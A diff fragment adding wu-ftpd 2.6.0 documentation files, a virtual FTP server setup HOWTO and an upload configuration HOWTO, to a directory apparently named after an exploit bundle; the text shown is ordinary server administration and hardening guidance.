+          If you are using the traditional "BSD-style bootup method",
+          edit the file /etc/rc.bsdnet instead.
+       2. Add a line such as the following example.
+          /usr/sbin/ifconfig tr0 inet xx.xx.xx.xx netmask yy.yy.yy.yy
+          alias 1>/dev/null 2>&1
+          Be sure to set the interface to the correct type if you are
+          not using token ring (tr0) as the example shows.
+     Refer to the ifconfig man pages. For more info on TCP/IP
+     configuration and tuning, review the "no" command.
+     4.5. After system configuration:
+     --------------------------------
+          In order to test your new configuration it is wise to
+          reboot your system. This assures that your system is
+          properly configured in the event of an non-planned
+          system halt/reboot. A problem here is that the system is
+          probably a production server for someone else... It is
+          recommended that you add virtual www/ftp servers to your
+          system at a scheduled maintenance time. Also, if you are
+          adding more than one virtual server, add them all and
+          simply reboot a single time. If you cannot reboot then
+          execute the appropriate ifconfig (or chkconfig) command
+          and test the reboot when you can.
+          Also, if not immediately rebooting, it's not a bad idea
+          to
+               arp -s XXX.XXX.XXX.XXX x:x:xx:xx:xx:xx pub
+          where XXX.XXX.XXX.XXX is the IP Address and where
+          x:x:xx:xx:xx:xx is the Ethernet/whatever hardware
+          physical address.
+     4.6. Testing interfaces:
+     ------------------------
+          You need to assure you can see the interfaces using
+          netstat and then try to ping the interface to assure it
+          is responding. If so, your system is now ready. Now it's
+          time to setup the FTPD server software and virtual
+          server directories.
+                                   [----]
+5. Building the software
+------------------------
+     1. In order to compile in virtual hosting support it is necessary 
+        to assure "VIRTUAL" is defined.  This is normally set in the
+        src/config.h file that is created when you run 'build'. You
+        should find the line
+        #define VIRTUAL
+        If it is not there, you will need to add it to your copy of config.h.
+   
+     2. Check pathnames.h. 
+   
+         Make sure you know where you want to put things on the system.
+         If you change the install paths, check and change the top level 
+         makefile as well.
+   
+     3. "build system-type".
+   
+     4. "make install".
+   
+         At this point do a "make install" in the wu-ftpd top-level source 
+         directory and things will be installed.  
+   
+                                   [----]
+6. Setting up the directory structure for virtual server support
+----------------------------------------------------------------
+     You will need to make sure the proper files/directories are in-place. 
+     Here is my structure. (Note: I put everything in a single directory 
+     structure for testing convenience. Actually I do that when I'm not 
+     testing as well...)
+    From my pathnames.h
+    
+    /*
+    ** Master Copies - Possibly overridden by VIRTUAL Hosting Configuation
+    */
+    
+    #define _PATH_FTPACCESS  "/etc/ftpd/ftpaccess"
+    #define _PATH_CVT        "/etc/ftpd/ftpconversions"
+    #define _PATH_FTPUSERS   "/etc/ftpd/ftpusers"
+    #define _PATH_PRIVATE    "/etc/ftpd/ftpgroups"
+    #define _PATH_FTPSERVERS "/etc/ftpd/ftpservers"
+    #define _PATH_FTPHOSTS   "/etc/ftpd/ftphosts"
+    
+    /* site-wide */
+    #define _PATH_PIDNAMES   "/etc/ftpd/ftp.pids-%s"
+    
+    LS Listing:
+    
+    rkive-19:43-kent ls -lR /etc/ftpd
+    /etc/ftpd:
+    total 36
+    drwxrwsr-x   2 root     sys          512 Jun 26 19:22 bin
+    drwxrwsr-x   4 root     sys          512 Jun 26 15:48 config
+    -rw-r--r--   1 root     sys         4096 Jun 26 19:23 ftp.pids-local
+    -rw-r--r--   1 root     sys         4096 Jun 26 19:33 ftp.pids-remote
+    -rw-------   1 root     sys         2046 Jun 26 14:55 ftpaccess
+    -rw-------   1 root     sys          873 Jun 26 14:55 ftpconversions
+    -rw-------   1 root     sys           37 Jun 26 14:55 ftpgroups
+    -rw-------   1 root     sys          277 Jun 26 14:55 ftphosts
+    -rw-------   1 root     sys          429 Jun 26 16:03 ftpservers
+    -rw-------   1 root     sys          151 Jun 26 14:55 ftpusers
+    drwxrwsr-x   6 root     sys          512 Jun 26 14:56 man
+    
+    /etc/ftpd/bin:
+    total 1848
+    -rwxr-xr-x   1 bin      bin        28312 Jun 26 19:22 ftpcount
+    -rwxr-xr-x   1 bin      bin        37512 Jun 26 19:22 ftprestart
+    -rwxr-xr-x   1 bin      bin        47264 Jun 26 19:22 ftpshut
+    -rwxr-xr-x   1 bin      bin        28312 Jun 26 19:22 ftpwho
+    -rwxr-xr-x   1 bin      bin       385568 Jun 26 19:22 in.ftpd
+    
+    /etc/ftpd/config:
+    total 12
+    drwxrwsr-x   2 root     sys          512 Jun 26 16:04 some.domain
+    drwxrwsr-x   2 root     sys          512 Jun 26 16:06 some.other.domain
+    drwxrwsr-x   2 root     sys          512 Jun 26 15:01 landfield.com
+    
+    /etc/ftpd/config/some.domain:
+    total 6
+    -rw-------   1 root     sys         1891 Jun 26 16:03 ftpaccess
+    -rw-------   1 root     sys          146 Jun 26 16:05 ftpusers
+    
+    /etc/ftpd/config/some.other.domain:
+    total 6
+    -rw-------   1 root     sys         1891 Jun 26 16:03 ftpaccess
+    -rw-------   1 root     sys          146 Jun 26 16:05 ftpusers
+    
+    /etc/ftpd/config/landfield.com:
+    total 4
+    -rw-------   1 root     sys         2046 Jun 26 15:01 ftpaccess
+    
+    /etc/ftpd/man:
+    total 8
+    drwxrwsr-x   2 root     sys          512 Jun 26 19:22 man1
+    drwxrwsr-x   2 root     sys          512 Jun 26 19:22 man1m
+    drwxrwsr-x   2 root     sys          512 Jun 26 19:22 man5
+    drwxrwsr-x   2 root     sys          512 Jun 26 14:56 man8
+    
+    /etc/ftpd/man/man1:
+    total 4
+    -r--r--r--   1 bin      bin          374 Jun 26 19:22 ftpcount.1
+    -r--r--r--   1 bin      bin          450 Jun 26 19:22 ftpwho.1
+    
+    /etc/ftpd/man/man1m:
+    total 28
+    -r--r--r--   1 bin      bin         2177 Jun 26 19:22 ftpshut.1m
+    -r--r--r--   1 bin      bin         805  Jun 26 19:22 ftprestart.1m
+    -r--r--r--   1 bin      bin        10813 Jun 26 19:22 in.ftpd.1m
+     
+    /etc/ftpd/man/man5:
+    total 40
+    -r--r--r--   1 bin      bin        15341 Jun 26 19:22 ftpaccess.5
+    -r--r--r--   1 bin      bin         1004 Jun 26 19:22 ftpconversions.5
+    -r--r--r--   1 bin      bin          683 Jun 26 19:22 ftphosts.5
+    -r--r--r--   1 bin      bin         2531 Jun 26 19:22 xferlog.5
+                                   [----]
+7. Configuring to support Virtual FTP Server Support
+----------------------------------------------------
+   --------------
+   7.1 Background
+   --------------
+    This version provides two different means for supporting virtual hosting.
+    You can choose to use the limited virtual hosting support or you can
+    use complete virtual support by having completely different ftpaccess 
+    files. 
+    In the limited support version, virtual servers are only partially 
+    supported.  This implementation of virtual servers only supports 
+    setting
+ 
+        - the root ftp directory, 
+        - the log file,
+        - the banner,
+        - the hostname, and
+        - the email address to contact.
+ 
+    All other directives in the ftpaccess file have to be shared globally 
+    across all virtual servers.  Below is the original message that
+    described how to setup limited virtual support.
+    ---------------------------------------
+    7.1.1. Limited Virtual Hosting Support:
+    ---------------------------------------
+    Date: Fri, 26 May 1995 21:33:23 -0400 (EDT)
+    From: Brian Kramer <bjkramer@pluto.njcc.com>
+    To: wu-ftpd@wugate.wustl.edu
+    Subject: Virtual FTP Servers
+    [Modifications to provide for discrete xferlogs for each server provided by
+    Marc G. Fournier <scrappy@ki.net> -- sob.]
+ 
+    I'm attaching a patch for wu-ftpd 2.4 to allow virtual ftp servers to be 
+    setup.  Basically so a user ftping to ftp1.domain.com gets one ftp banner 
+    and one ftp directory and a user ftping to ftp2.domain.com gets another 
+    banner and directory even though they are on the same machine and port.
+    I was the person who originally asked how to do it, and got enough answers 
+    to write a patch that would allow it.  You have to be able to setup alias 
+    IP addresses in order for this to work.  I know linux and bsdi support this.
+    I do not warrant this code at all.  Use it AT YOUR OWN RISK.  If it causes 
+    your computer to blow up, TOUGH! 
+    Here's the steps.
+ 
+    Compile the software with -DVIRTUAL added to the CFLAGS in the Makefile
+    Add lines similar to the following for each virtual server to ftpaccess:
+    # Virtual Server at 10.10.10.10
+    virtual 10.10.10.10 root    /var/ftp/virtual/ftp-serv 
+    virtual 10.10.10.10 banner  /var/ftp/virtual/ftp-serv/banner.msg
+    virtual 10.10.10.10 logfile /var/log/ftp/virtual/ftp-serv/xferlog
+    
+    The first arg is the ip address of the virtual server.
+    The second arg is either "root", "banner" or "logfile" (without the quotes)
+    for that virtual server.
+    The third arg is the file system location for the item specified in the 
+    second arg.
+    
+    Note: all the other message files, etc, and permissions and other settings
+    in the ftpaccess file apply to all virtual servers.
+    ----------------------------------------
+    7.1.2. Complete Virtual Hosting Support:
+    ----------------------------------------
+ 
+    Now you can use the previous method or you can create a separate ftpaccess
+    to provide support for all ftpaccess directives.  The ftpaccess, ftpusers, 
+    ftpgroups, ftphosts and ftpconversions files can all be specified on a 
+    per-domain basis.  You now have the ability to override the Master WU-FTPD 
+    config files with a local copy specific to that domain. If you do not wish 
+    to place a copy of one or all files listed above in the virtual host 
+    directory for that specific host then the master copy is used. 
+ 
+    Supported on a virtual host basis:
+    ----------------------------------
+    _PATH_FTPACCESS  
+    _PATH_FTPUSERS   
+    _PATH_PRIVATE    
+    _PATH_FTPHOSTS   
+    _PATH_CVT        
+     
+    Set in a virtual site's ftpaccess file or master ftpaccess file
+    ---------------------------------------------------------------
+    _PATH_XFERLOG  
+     
+    Supported on a site-wide basis:
+    -------------------------------
+    _PATH_FTPSERVERS
+    _PATH_EXECPATH
+    _PATH_PIDNAMES
+    _PATH_UTMP 
+    _PATH_WTMP
+    _PATH_LASTLOG
+    _PATH_BSHELL 
+    _PATH_DEVNULL
+    
+   ------------------------------
+   7.2 Create an ftpservers file:
+   ------------------------------
+   If you wish to take advanage of the extended virtual support it is 
+   necessary to create an ftpservers file.  A real simple sample is 
+   shown below.
+   #
+   # ftpservers file
+   #
+   # Format:
+   #   IP Address     Path to directory holding configuration 
+   #   or hostname    files for this virtual domain
+   #
+   # ftpaccess file for the landfield.com domain
+   #
+   landfield.com      /etc/ftpd/config/landfield.com
+   #
+   # ftpaccess file for the some.domain 
+   #
+   some.domain       /etc/ftpd/config/some.domain
+   #
+   # ftpaccess file for the some.other.domain 
+   #
+   208.196.145.140 /etc/ftpd/some.other.domain
+   #
+   Make sure to create the directories you have listed. 
+   ----------------------------
+   7.3 Virtual ftpaccess files:
+   ----------------------------
+   For each virtual domain that you want to support, you have the option
+   to create a ftpaccess file specific for that domain. This will override 
+   completely what you have in the Master ftpaccess file.  This file must 
+   contain all directives. If you do not create an ftpaccess file for a 
+   specific domain, the domain will use the Master ftpaccess file settings. 
+   The only additions to the ftpaccess file that you need to make over a
+   non-virtual version is the "root" and "logfile" directives.  These act
+   to assure the proper ftpd root directory is used for each of the supported
+   virtual domains.  The logfile directive is used to specify where you want
+   the transfer logs recorded for that specific virtual domain.  A sample is
+   specfied below.
+        root     /ftp
+        logfile  /var/log/xferlog
+   -----------------------------------------
+   7.4. Master ftpaccess file Modifications:
+   -----------------------------------------
+     If you do not want to setup a completely different ftpaccess file
+     for a virtual domain, you can specify five separate things for the 
+     virtual server you want to setup in the master ftpaccess file.
+       1. root     - This it the path to the ftp directory that you
+                     previously setup for this virtual server.
+       2. banner   - This it the path to banner you wish displayed when a
+                     user connects to the virtual server.
+       3. logfile  - This is the path to the logfile that is setup
+                     specifically for this virtual server.
+       4. hostname - This is the hostname of the virtual server.
+                     specifically for this virtual server.
+       5. email    - This is the email address to direct comments to
+                     specifically for this virtual server.
+     The format of a virtual server entry is
+          virtual <address> <root | banner | logfile> <path>
+     <address> is the IP address of the virtual server. The second
+     argument specifies the <path> is either the path to the root of
+     the filesystem for this virtual server, the banner presented to
+     the user when connecting to this virtual server, or the logfile
+     where transfers are recorded for this virtual server. If the
+     logfile is not specified the default logfile will be used.
+     For example, add lines similar to the following for each virtual
+     server you are trying to set up.
+          # Virtual Server at 10.10.10.10
+          virtual 10.10.10.10 root     /var/ftp/virtual/ftp-serv
+          virtual 10.10.10.10 banner   /var/ftp/virtual/ftp-serv/banner.msg
+          virtual 10.10.10.10 logfile  /var/log/ftp/virtual/ftp-serv/xferlog
+          virtual 10.10.10.10 hostname froggy 
+          virtual 10.10.10.10 email    ftp-admin@froggy.some.domain
+     Done this way, all other message files and permissions as well as any 
+     other settings in the Master ftpaccess file apply to all listed virtual 
+     servers.
+   ---------------------------------------
+   7.5. Adding other virtual domain files:
+   ---------------------------------------
+    With this release you have the ability to create other configuration
+    files on a per-virtual-domain basis.  Currently, the files you put into 
+    the virtual domain directory you have listed in the ftpservers file 
+    MUST be named:
+    ftpaccess - virtual domain's access file
+    ftpusers  - restrict the accounts that can use the web server,
+    ftpgroups - SITE GROUP and SITE GPASS support,
+    ftphosts  - allow or deny usernames access to that virtual server,
+    ftpconversions - customize conversions available in the virtual domain.
+    NOTE!!!: If you misspell any of them or name them something else, the 
+             server WILL NOT find them and the master copy of them will be
+             used instead.
+                                   [----]
+8. Setting up other support files
+---------------------------------
+     You will need to make sure that any file referenced after the
+     chroot(~ftp) are in the virtual server directories. Those files
+     are
+        * all messages (deny, welcome, etc.)
+        * _PATH_EXECPATH files
+     You will need to customize the banner, welcome and other message
+     files for each virtual server directory.
+                                   [----]
+9. Supporting virtual logging
+-----------------------------
+     There are two different types of logging, the standard syslog
+     logging and transfer logging. In order to separate transfer (or
+     xferlog) logging it is necessary to use the "logfile" entry as 
+     described above.
+     To enable logging via syslog, follow the standard syslog
+     configuration instructions found in your system's documentation.
+     Make sure you are using the same syslog 'facility' as is compiled
+     into your wu-ftpd software. By default, 'daemon' is used. If you
+     would like to change this, change the 'FACILITY' define in
+     config.h.
+     If you have syslog logging enabled you will see entries such as
+     Mar 3 15:26:30 rkive ftpd[27207]: VirtualFTP Connect to: xxx.xxx.xxx.xxx
+     This enables you to determine which virtual server the log records
+     pertain to.
+                                   [----]
+10. Shutting down your virtual FTP servers
+-------------------------------------------
+     In order to support the proper shutting down of your server, you
+     need to assure the shutdown message file is created in both the
+     real user and anonymous user ftp areas. The location of the
+     shutdown message file is specified in the ftpaccess file
+     "shutdown" directive.
+     In previous versions of wu-ftpd it was recommended to create a 
+     link to where the shutdown message file would be in order for
+     shutdown to work properly for real and anonymous user. The problem
+     was the supplied utility, 'ftpshut', only created the shutdown
+     message file in the actual location as indicated in the shutdown
+     directive and not in the anonymous FTP area. It also did not have
+     support for virtual server shutdown. And when you were ready to
+     restart your servers, you need to remove the shutdown message
+     file manually.
+     In order to overcome this, wu-ftpd has been modified to support
+     shutting down the server for real users and guest/anonymous 
+     accounts and also for virtual FTP servers. It creates shutdown
+     message files in all appropriate locations.
+                                   [----]
+11. Restarting your shutdown virtual FTP servers
+-------------------------------------------------
+     When you are ready to restart your ftp servers you will need to
+     remove the shutdown message files. ftprestart is used when you 
+     are ready to re-enable your FTP server. It does the opposite of 
+     ftpshut and removes shutdown message files that were created by 
+     ftpshut. It will remove the system-wide shutdown message file as 
+     well as the shutdown message files in the anonymous ftp areas and 
+     any virtual ftp server areas.
+     NOTE: At present it is either all-or-nothing when it comes to
+           ftpshut and ftprestart. You cannot shutdown just a single
+           server.  If you need to do that you will have to do it
+           manually at present.
+                                   [----]
+12. Testing Your New Shiny Virtual Server Setup
+-----------------------------------------------
+     A good test strategy is to create an entire runtime directory dedicated 
+     to wu-ftpd such as /usr/local/wu-ftpd-test/ or /etc/ftpd/ and make 
+     sure all the files and executables go there.  In that manner you will be 
+     able to do a hot swap if you ever want to/need to (shouldn't be necessary
+     but please CYA... ;))
+     You will need to test each and every new virtual server you
+     install. Make sure that you have the appropriate permissions and
+     are getting the right results. Only you will know what is right
+     for you.
+     Also, if you have existing FTP server areas on your system, test
+     and make sure that something you did to the ftpaccess file did not
+     break what use to work.
+     If you want to see what set of configuration files are being used you
+     can set '-DVIRTUAL_DEBUG' in the makefile.  Build and install the new
+     version and see what prints out.  Please don't run with this debug
+     option enabled as it give much to much information out to those that
+     have no 'need to know'.
+                                   [----]
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO
new file mode 100644
index 0000000..dc845ec
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO
@@ -0,0 +1,463 @@
+ 
+  Copyright (c) 1999 WU-FTPD Development Group.  
+  All rights reserved.
+  
+  Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994
+    The Regents of the University of California.
+  Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.
+  Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.
+  Portions Copyright (c) 1989 Massachusetts Institute of Technology.
+  Portions Copyright (c) 1998 Sendmail, Inc.
+  Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P.  Allman.
+  Portions Copyright (c) 1997 Stan Barber.
+  Portions Copyright (c) 1997 Kent Landfield.
+  Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997
+    Free Software Foundation, Inc.  
+ 
+  Use and distribution of this software and its source code are governed 
+  by the terms and conditions of the WU-FTPD Software License ("LICENSE").
+ 
+  If you did not receive a copy of the license, it may be obtained online
+  at http://www.wu-ftpd.org/license.html.
+ 
+  $Id: upload.configuration.HOWTO,v 1.1 1999/09/20 02:02:17 wuftpd Exp $
+ 
+                           Upload Configuration
+                                  HOW-TO
+This document is available on-line at:
+  ftp://ftp.wu-ftpd.org/pub/wu-ftpd/upload.configuration.HOWTO
+One of the more powerfull, yet most often misused, features of WU-FTPD is
+the upload clause.  Historically, the problems with the upload clause stem
+from unclear documentation and poor implementation.  This document is an
+attempt to address these issues.  The features discussed in this document
+apply to WU-FTPD Version 2.6.0.  If you are not running 2.6.0, you are
+strongly encouraged to upgrade; it includes a number of corrections, new
+features and security enhancements not available with earlier versions of
+WU-FTPD.
+Upload restrictions for anonymous FTP users
+-------------------------------------------
+For this example, we'll assume your system /etc/passwd file contains an
+entry for the anonymous FTP user as follows:
+ftp:*:95:95::/home/ftp:
+If your /etc/passwd file does not contain an entry for the user 'ftp' your
+site will not allow anonymous FTP.  In addition, if the usernames 'ftp' or
+'anonymous' appear in the /etc/ftpusers file, anonymous FTP will not be
+allowed.
+In /etc/ftpaccess, we need a class which allows anonymous access.  The
+following allows anonymous FTP from anywhere:
+class anonftp anonymous *
+To prevent anonymous FTP users attempting a Denial of Service (DoS) attack
+against your system, you should create a special filesystem to receive
+their uploads.  This separate filesystem protects your server by limiting
+the total size of all uploaded files while preventing those files from
+consuming all available space on the server.  For this example, mount the
+filesystem on /home/ftp/incoming
+By default, the server will not allow uploads from anonymous FTP users.
+Just to be safe, and so we don't forget, let's add a clause saying that:
+upload /home/ftp * no
+What this says is, "For any user whose home directory is the anonymous FTP
+area, /home/ftp, do not allow any uploads."  As I said, this is the
+default, but put it in anyway so you don't forget.
+Now, we want to allow uploads into the incoming filesystem.  We MUST add a
+clause granting that privilege to anonymous users.  Right now we don't want
+to let anonymous users create directories.  (I recommend NEVER allowing them
+to do it, but I'll show you how in a bit.)  We want to ensure, however,
+the server is safe and cannot be used as a way-point for software pirates
+(warez traders).  So we'll set the directory permissions for the incoming
+area to prevent anyone seeing what's there and make the area write-only for
+anonymous users.
+First, we need an FTP site administrator, someone who owns the files, but
+isn't the root user or the anonymous user.  Something like the following
+/etc/passwd entry will do:
+ftpadmin:*:96:96::/home/ftp:
+Set the incoming area permissions and ownership to safe values.  I
+recommend the following:
+chown ftpadmin /home/ftp/incoming
+chgrp ftpadmin /home/ftp/incoming
+chmod 3773 /home/ftp/incoming
+Actually, ftpadmin should own more of the site, but I'm only talking about
+uploads right now.
+Finally, before we get into allowing uploads, one last thing.  Whether you
+allow on-the-fly tar'ing of directories or not, you should make sure an
+end-run cannot be made and the incoming area downloaded using tar.  To do
+so, create the special file '.notar' in both the FTP directory and the
+incoming area:
+touch /home/ftp/.notar
+chmod 0 /home/ftp/.notar
+touch /home/ftp/incoming/.notar
+chmod 0 /home/ftp/incoming/.notar
+The zero-length .notar file can confuse some web clients and FTP proxies,
+so let's mark it unretrievable.
+noretrieve .notar
+Time to allow uploads, put the following in /etc/ftpaccess:
+upload /home/ftp /incoming yes ftpadmin ftpadmin 0440 nodirs
+Notice the target directory for the uploads is relative to the view the
+user will have during the FTP session.
+What this says is, "For any user whose home directory is the anonymous FTP
+area, /home/ftp, allow uploads into the directory /incoming but do not
+allow the creation of new directories.  Make all files uploaded owned by
+the FTP administrator, mark them read-only so we don't allow them to be
+downloaded."  If uploaded files are to be made available for downloading,
+the safest thing to do is to tell the FTP administrator to move them into a
+public area and modify the permissions after validating and approving them.
+I know this seems draconian but, in the long run, it's best.
+Some FTP sites like to live dangerously and allow anonymous users to create
+directories.  I don't recommend this; it cannot be done with absolute
+safety.  If you insist, however, you can at least limit it to a single
+directory level.  For example, replace the upload clause just added with
+the following:
+upload /home/ftp /incoming   yes ftpadmin ftpadmin 0440 dirs 3773
+upload /home/ftp /incoming/* yes ftpadmin ftpadmin 0440 nodirs
+The first line allows directories to be created in the incoming area and
+enforces the use of safe permissions on them.  The second prevents creation
+of deeper sub-directories.  Notice one of the problems with allowing
+directory creation is there is no way to automatically create a '.notar' in
+the new directory, so a crafty user may be able to make an end-run and
+download it anyway using on-the-fly tar'ing.
+One last thing: since the incoming area shouldn't allow downloads, and
+since it's a file system, there will be a lost+found area; you will want to
+add the following clause to make SURE no downloads occur:
+noretrieve /home/ftp/incoming
+or, at least, add the following to prevent downloading of the lost+found
+files:
+noretrieve /home/ftp/incoming/lost+found
+Upload restrictions for guest users
+-----------------------------------
+Setting up the FTP server for guest users is covered in the Guest HOWTO.
+It is not my purpose here to cover how to set up for guest access.  If you
+have not yet done so, review the information in that document at:
+  ftp://ftp.fni.com/pub/wu-ftpd/guest-howto
+For this example, I'll assume you have entries similar to the following in
+your system /etc/passwd file:
+dick:*:1010:1010::/home/users/./dick:/bin/sh
+jane:*:1011:1011::/home/users/./jane:/bin/sh
+By default, the WU-FTPD server will grant upload privileges to all guest
+users.  The example users are chroot'd to /home/users and cannot access any
+area of the filesystem outside that directory structure.  What we're
+interested in, then, is simply protecting the areas in the chroot directory
+structure we want to keep the users out of.
+In a minimal installation, there will be bin, etc and dev, subdirectories
+in the /home/users directory.  Other files and subdirectories may exist
+depending upon the requirements of your operating system.  We don't want
+users being able to upload into these areas.  In case something happens to
+the permissions on them (you did set the permissions to safe values, didn't
+you?), you should deny upload privileges in your ftpaccess file.  In our
+case, we'll say the following:
+upload /home/users/* /    no
+upload /home/users/* /bin no
+upload /home/users/* /etc no
+upload /home/users/* /dev no
+While we're at it, we'll prevent downloads with noretrieve.  Don't forget
+to prevent end-runs by also creating .notar files in each directory.
+noretrieve /home/users/bin
+noretrieve /home/users/etc
+noretrieve /home/users/dev
+Upload restrictions for real users
+----------------------------------
+First off, let me say you shouldn't have any real users in your FTP site.
+Or, being more realistic, the only real user should be the site
+administrator.  That being said, real users should be restricted to
+uploading only into specific areas.  Let's start with a real user in
+/etc/passwd:
+ftpadmin:*:109:109::/home/users/ftpadmin:/bin/sh
+Again, by default, the server will grant upload privileges everywhere, so
+we have to start by revoking them and only allowing what we want to:
+upload /home/users/ftpadmin *                      no
+upload /home/users/ftpadmin /tmp                   yes nodirs
+upload /home/users/ftpadmin /home/users/ftpadmin   yes
+upload /home/users/ftpadmin /home/users/ftpadmin/* yes
+upload /home/users/ftpadmin /home/ftp/incoming     yes ftpadmin ftpadmin 0440 nodirs
+About matching rules
+--------------------
+Use extreme care when forming wildcard matching rules.  It may be tempting
+to say, for instance:
+upload /home/users/ftpadmin /home/users/ftpadmin* yes
+But, if you do, there will be unintended consequences.  In the example,
+we're trying to restrict upload privileges to just the ftpadmin's home
+directory.  Consider, though, this will match all of the following
+directories:
+/home/users/ftpadmin
+/home/users/ftpadmin/mirrors
+/home/users/ftpadministration
+This last directory isn't wanted.  Instead use:
+upload /home/users/ftpadmin /home/users/ftpadmin   yes
+to match the ftpadmin's home directory itself, then use:
+upload /home/users/ftpadmin /home/users/ftpadmin/* yes
+to match all subdirectories under the ftpadmin's home.
+umasks for guest and real users
+-------------------------------
+In most cases you will want to allow guest and real users to control the
+permissions on their own files and directories.  As in the examples shown,
+if there are no specific permissions given on upload clauses, any new files
+or directories created will have all permissions set.  umasks can be used
+to reduce these permissions.
+The daemon has a command-line option (-u) to set the default umask for all
+users.  Follow the -u option with an octal permissions mask.  Bits in this
+mask are permissions to turn off whenever the daemon creates a new file or
+directory.  The manpage for ftpd documents the -u option.
+Often times, the global -u option is not sufficient.  In the ftpaccess
+file, you can control umasks by class by using the defumask clause.  If no
+class is given, defumask overrides the -u umask from the command line.  If
+the current user is a member of the named class, defumask overrides the
+umask setting for this user only.
+For example, assume there are several classes of users
+class admin  real       10.0.0.0/8 127.0.0.0/8
+class local  guest      10.0.0.0/8 127.0.0.0/8
+class remote guest      *
+class anon   anonymous  *
+( Notice, by the way, in this example, real users will not be allowed
+access unless from the local network since they are not in any class when
+coming from an outside IP address.  Since the daemon gives no clue to the
+remote user in this case, to outside addresses it will appear as if the
+admin users do not exist on the server.  The specific cause for their login
+failure will appear in your system logs. )
+We can control the umask by class for these users.  For example, we might
+say:
+defumask 0377
+defumask 0177 admin
+defumask 0133 local remote
+The first clause applies whenever another defumask clause does not match
+the current user's class.  This is the same as adding '-u 0377' to the
+command line for the FTP daemon.  In this case, the clause applies only to
+anonymous users since all other classes have specific default umasks given.
+The second turns off execute permissions, as well as group- and world- read
+and write permissions, for all files and directories created by real users
+(users in the admin class).
+The last rule turns off execute permissions and group- and world-write
+permissions for files and directories created by guests (in the local and
+remote classes).
+Remember: umasks apply to ALL files and directories created EXCEPT those
+where an upload clause applies AND the upload clause gives specific
+permissions.  Disabling execute permissions will cause problems using newly
+created directories; leaving them enabled is unsafe because all files
+uploaded will have execute permission and could, therefore, be used in
+attempts to break into the server.
+I recommend disabling all execute permissions and instructing your users to
+use the chmod command to add execute permissions to directories or to
+change the umask before creating directories.  This may be a bit more work
+for your users, but it is safer than having a Trojan Horse program marked
+executable just waiting for someone, possibly root, to try running it.
+umask and chmod command restrictions
+------------------------------------
+As just mentioned, users have the ability to change the current umask and
+modify the permissions on files and directories.
+Obviously, you will want to disable this feature for anonymous users.  You
+may also want to control who may use these features for your guest and real
+users.  The defaults should be acceptable for most sites.  The default
+settings are equivalent to the following (which you may want to add to your
+ftpaccess file so you don't forget):
+chmod no  anonymous
+chmod yes real,guest
+umask no  anonymous
+umask yes real,guest
+If, for example, you wanted to disable these commands for guests accessing
+the server from outside the local network, you could add the following:
+chmod no  class=remote
+umask no  class=remote
+Be sure to insert these _before_ the 'yes' clauses.  Order is important;
+the daemon will apply the first matching rule it finds.   If you do
+something like this, it is probably safer to rewrite the clauses to deny
+everything but what you allow.  For example:
+chmod yes real,class=local
+umask yes real,class=local
+chmod no  guest,anonymous
+umask no  guest,anonymous
+Delete, overwrite, rename restrictions
+--------------------------------------
+The daemon also provides control over the user's ability to delete, over-
+write and rename files.  Again, the defaults are probably acceptable in
+most cases.  These are:
+delete no  anonymous
+delete yes real,guest
+rename no  anonymous
+rename yes real,guest
+overwrite no  anonymous
+overwrite yes real,guest
+As with the chmod and umask clauses, you can control these by class as
+well.  Continuing the above example, restricting these to local users only,
+we could instead say:
+delete    yes real,class=local
+rename    yes real,class=local
+overwrite yes real,class=local
+delete    no  guest,anonymous
+rename    no  guest,anonymous
+overwrite no  guest,anonymous
+Per-class upload clauses
+------------------------
+Just as we can restrict the ability to change permissions, delete files,
+etc., we can also define upload clauses which apply only to specific
+classes of users.  For instance, with the classes from the above examples,
+we can revoke upload rights for remote guests.
+For example, we can deny all uploads the remote guests except to their
+personal tmp directories:
+upload class=remote /home/users/* *      no
+upload class=remote /home/users/* /*/tmp yes nodirs
+Private incoming areas
+----------------------
+Often times, users would like to have private areas in the FTP site.
+Sometimes, it is usefull to also have incoming areas in those private
+areas.  Examples of the permissions for private areas can be found in the
+layout at ftp://ftp.wu-ftpd.org/pub/wu-ftpd/examples/ and, other than
+ownership, are no different than the public incoming area, so I'll simply
+present the upload clauses here.
+For this example, we'll allow anonymous uploads into all private incoming
+areas:
+upload /home/ftp            /private/*/incoming          yes * * 0440 nodirs
+upload /home/users/ftpadmin /home/ftp/private/*/incoming yes * * 0440 nodirs
+The assumption here is Unix shell users have private areas in the anonymous
+site.  Those areas are owned by the appropriate user, and incoming files
+are to be owned by that user.  The wildcard match on directory allows
+anonymous uploading to any private incoming directory.  The wildcard for
+owning user and group instructs the daemon to set the file's ownership to
+that of the directory receiving it.
+Don't forget, if you allow private incoming areas, they are open for
+anonymous access and you should take care to ensure a DoS attempt to fill
+the file system cannot take out your entire server.  Create a separate
+filesystem for the private incoming areas or put them inside the public
+incoming area.
+Differences from earlier versions
+---------------------------------
+This HOWTO was written for  version 2.6.0 of the WU-FTPD server.  Earlier
+versions used different rules for the upload clause.
+Some versions of the daemon required the first parameter to be the name of
+the root directory for the chroot.  This allowed upload control by area,
+but did not provide for different rules on a per-user basis.
+Some versions of the daemon required the first parameter to be lexically
+identical to the user's home directory entry.  This was non-obvious and the
+'/./' was often forgotten.
+Some versions of the daemon got totally confused, attempted to apply both
+these methods at once, and ended up ignoring all your upload rules.  If you
+were smart, you had your permissions set properly and didn't notice.
+Early versions of the VR upgrades, and all earlier versions of the daemon,
+allowed file system modification as the default for all users.  The current
+version does not allow any modification commands (ie., upload, delete,
+rename) by anonymous users unless specifically granted in the ftpaccess
+file.
+Early versions of the VR upgrades, and all earlier versions of the dameon,
+had no method for specifying the permissions for a newly created directory.
+Also, they required exact matches for the first parameter (no globbing) and
+exact user and group names or numbers for ownership file files and
+directories.
+-- 
+Gregory A Lundberg              WU-FTPD Development Group
+1441 Elmdale Drive              lundberg@wu-ftpd.org
+Kettering, OH 45409-1615 USA    1-800-809-2195
